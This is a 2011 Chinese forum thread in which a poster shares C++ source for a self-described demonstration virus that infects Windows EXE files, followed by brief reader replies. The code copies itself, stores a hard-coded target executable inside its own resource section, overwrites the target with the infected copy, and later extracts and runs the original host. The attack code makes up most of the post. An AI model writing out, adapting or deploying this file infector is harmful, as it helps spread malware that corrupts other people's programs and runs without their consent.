首页
论坛
专栏
课程

[旧帖] [原创]很土的感染EXE文件的方法。 0.00元

2011-9-18 22:44 1985

[旧帖] [原创]很土的感染EXE文件的方法。 0.00元

2011-9-18 22:44
1985
发表一个感染EXE病毒code:

#include "stdafx.h"

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
 	// TODO: Place code here.
char syspath[256];
TCHAR src[MAX_PATH]="xx.exe";
TCHAR szMyName[MAX_PATH];
TCHAR szTempFileA[MAX_PATH];
TCHAR szTempFileB[MAX_PATH];
GetSystemDirectory(syspath,256);
GetModuleFileName(NULL,szMyName,MAX_PATH);
HANDLE hFile;
DWORD dwFileSize, 
dwBytesRead;
STARTUPINFO si;
PROCESS_INFORMATION pi;
MessageBox(NULL,"这是一个病毒,你可以选择感染的文件,也可不选~","演示病毒UpadatResource 1.0",0x1000);
GetTempFileName(syspath,"vic",0,szTempFileA);
GetTempFileName(syspath,"host",0,szTempFileB);
CopyFile(szMyName,szTempFileA,0);//病毒体copy到szTempFileA里
HMODULE hLibrary;
HRSRC hResource;
HGLOBAL hResourceLoaded;
LPBYTE lpBuffer;
hLibrary = LoadLibrary(szTempFileA);
if (NULL != hLibrary)
{

		
	hResource = FindResource(hLibrary, MAKEINTRESOURCE(104), RT_RCDATA);  [COLOR="Magenta"]//打开指定的节。如果打开成功则写入临时文件执行。[/COLOR]
        if (NULL != hResource)

		{
           
			hResourceLoaded = LoadResource(hLibrary, hResource);
              
			if (NULL != hResourceLoaded) 
			
			{

				lpBuffer = (LPBYTE) LockResource(hResourceLoaded); 

				if (NULL != lpBuffer) 

				{ 

					DWORD dwBytesWritten;

					dwFileSize = SizeofResource(hLibrary, hResource);

					hFile = CreateFile(szTempFileB,

						GENERIC_WRITE,

						0,

						NULL,

						CREATE_ALWAYS,

						FILE_ATTRIBUTE_NORMAL,

						NULL);


					if (INVALID_HANDLE_VALUE != hFile)

					{


							MessageBox(NULL,szTempFileB,GetCommandLine(),0x1000);
	
						WriteFile(hFile, lpBuffer, dwFileSize, &dwBytesWritten, NULL);


						CloseHandle(hFile);

					}

					GetStartupInfo(&si);

					CreateProcess(szTempFileB,GetCommandLine(),NULL,NULL,NULL,NULL,NULL,NULL,&si,&pi);
	
					MessageBox(NULL,szTempFileB,GetCommandLine(),0x1000);

				}

			} 

		}

FreeLibrary(hLibrary);
}

char Filename[256] = "c:\\ssss.exe"; //被感染的文件路径。。
hFile = CreateFile(Filename, GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);

if(INVALID_HANDLE_VALUE == hFile)
{
	MessageBox(NULL,"HOST文件打开失败","。",0x1000);
}
if (INVALID_HANDLE_VALUE != hFile)
{
		

dwFileSize = GetFileSize(hFile, NULL);

lpBuffer = new BYTE[dwFileSize];

if (ReadFile(hFile, lpBuffer, dwFileSize, &dwBytesRead, NULL) != FALSE)
{
	

hResource = (HRSRC)BeginUpdateResource(szTempFileA, FALSE);
if (NULL != hResource)
{

	
if (UpdateResource(hResource,
RT_RCDATA,
MAKEINTRESOURCE(104),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPVOID) lpBuffer,
dwFileSize) != FALSE)
{

EndUpdateResource(hResource, FALSE);
}

}

delete [] lpBuffer; 
CloseHandle(hFile);


if(CopyFile(szTempFileA,Filename,0))
{
		//	MessageBox(NULL,Filename,szTempFileA,0x1000);
}//Any Thing is every thing~
Sleep(1000);


DeleteFile(szTempFileA);
while(!DeleteFile(szTempFileB)) ;
}
}

	return 0;
}





2020安全开发者峰会(2020 SDC)议题征集 中国.北京 7月!

最新回复 (10)
cooseasy 2011-9-18 22:54
2
0
看看再说、六个字!
skylin林子 2011-9-19 10:00
3
0
看看再说,呵呵
dayang 2011-9-19 10:04
4
0
这东西主要是兼容性必须得好
sixge 2011-9-19 10:41
5
0
看不懂,不过啊还是谢谢
elianmeng 1 2011-9-19 10:47
6
0
我想问一下 有什么意义
hezhang 2011-9-19 11:32
7
0
嗯  果然。。。
symanli 2011-9-20 12:02
8
0
学习啊啊
小P孩儿 2011-9-20 13:07
9
0
好怕怕的东西
傻子晴天 2011-9-20 17:33
10
0
不错,学习了
qeqe 2011-9-20 23:54
11
0
感染起来原来是这么简单啊
游客
登录 | 注册 方可回帖
返回